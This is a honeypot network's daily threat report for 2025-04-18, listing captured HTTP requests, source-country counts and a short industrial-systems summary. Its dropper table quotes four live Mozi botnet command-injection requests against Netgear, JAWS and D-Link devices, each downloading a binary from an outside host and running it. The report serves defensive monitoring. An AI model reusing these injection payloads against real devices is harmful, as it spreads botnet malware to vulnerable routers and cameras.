Daily Report: 2025-04-18#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 39 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1606 requests were recorded during the day, originating from 4 different countries, with a peak of 392 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
14.102.189.165 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
139.5.0.142 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.206.103.184 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.206.103.184:59799/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.199.180.230 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.199.180.230:45172/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
106 | 3 | GET /.well-known/agent.json HTTP/1.1 |
232 | 1 | GET /config/index?time=1744967097027290096 HTTP/1.1 |
233 | 1 | GET /config/index?time=1744965374806952242 HTTP/1.1 |
234 | 1 | POST /api/user/binLookup?time=1744962468230666878 HTTP/1.1 |
306 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA3h\xF6\x7F\x00\x00\x90\xF4\xBF\xA4p\x00\x00\x00\xE0\x81\xC8h\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
307 | 1 | \x00\x0E8F;\xFB\x8D\xAE\x8C\xCD\x9B\x00\x00\x00\x00\x00 |
349 | 1 | POST /api/user/binLookup?time=1744969052257386757 HTTP/1.1 |
350 | 1 | GET /api/bin/440393?time=1744969051662221363 HTTP/1.1 |
351 | 1 | GET /config/index?time=1744967880456244302 HTTP/1.1 |
352 | 1 | GET /config/index?time=1744965641481793503 HTTP/1.1 |
356 | 1 | POST /api/user/binLookup?time=1744961909479266222 HTTP/1.1 |
357 | 1 | GET /api/bin/440393?time=1744961908962995955 HTTP/1.1 |
361 | 1 | POST /api/user/binLookup?time=1744954258804599153 HTTP/1.1 |
362 | 1 | GET /api/bin/440393?time=1744954258277572194 HTTP/1.1 |
370 | 1 | POST /api/user/binLookup?time=1744989300926169472 HTTP/1.1 |
371 | 1 | GET /api/bin/440393?time=1744989300414924616 HTTP/1.1 |
372 | 1 | GET /config/index?time=1744988199768680375 HTTP/1.1 |
377 | 1 | POST /api/user/binLookup?time=1744983103817730368 HTTP/1.1 |
378 | 1 | GET /api/bin/440393?time=1744983103303579949 HTTP/1.1 |
379 | 1 | GET /config/index?time=1744979531930928544 HTTP/1.1 |
380 | 1 | GET /NmapUpperCheck1744989965 HTTP/1.1 |
393 | 1 | GET /blIE HTTP/1.1 |
394 | 1 | GET /nmaplowercheck1744989965 HTTP/1.1 |
408 | 1 | GET /Nmap/folder/check1744989965 HTTP/1.1 |
479 | 1 | POST /api/user/binLookup?time=1744968039523618468 HTTP/1.1 |
480 | 1 | GET /api/bin/440393?time=1744968038864619656 HTTP/1.1 |
481 | 1 | GET /config/index?time=1744967148178360507 HTTP/1.1 |
482 | 1 | GET /config/index?time=1744965446957789924 HTTP/1.1 |
483 | 1 | POST /api/user/binLookup?time=1744962780805968376 HTTP/1.1 |
484 | 1 | GET /api/bin/440393?time=1744962780410449261 HTTP/1.1 |
485 | 1 | GET /api/bin/440393?time=1744954989337907718 HTTP/1.1 |
495 | 1 | POST /api/user/binLookup?time=1744989013066329965 HTTP/1.1 |
496 | 1 | GET /api/bin/440393?time=1744989012643577876 HTTP/1.1 |
498 | 1 | GET /config/index?time=1744987813205266966 HTTP/1.1 |
500 | 1 | POST /api/user/binLookup?time=1744980935211061485 HTTP/1.1 |
501 | 1 | GET /api/bin/440393?time=1744980934804354971 HTTP/1.1 |
502 | 1 | POST /api/user/binLookup?time=1744967966225311071 HTTP/1.1 |
503 | 1 | GET /api/bin/440393?time=1744967965566904723 HTTP/1.1 |
519 | 1 | GET /api/bin/440393?time=1744955638793993480 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 392 | US |
1 | 199 | GB |
2 | 182 | NL |
3 | 115 | RU |
4 | 115 | CN |
5 | 112 | BG |
6 | 97 | LT |
7 | 76 | DE |
8 | 71 | HK |
9 | 55 | PL |
10 | 42 | ID |
11 | 16 | IN |
12 | 13 | UA |
13 | 13 | KR |
14 | 12 | CA |
15 | 11 | NO |
16 | 9 | RO |
17 | 9 | SC |
18 | 8 | JP |
19 | 7 | PT |
20 | 6 | IT |
21 | 6 | VN |
22 | 5 | BE |
23 | 4 | LA |
24 | 4 | SG |
25 | 3 | GH |
26 | 3 | IL |
27 | 3 | TH |
28 | 3 | BR |
29 | 2 | AO |
30 | 2 | FR |
31 | 2 | AZ |
32 | 2 | AU |
33 | 1 | CH |
34 | 1 | PE |
35 | 1 | AR |
36 | 1 | EC |
37 | 1 | GE |
38 | 1 | SE |
39 | 1 | TR |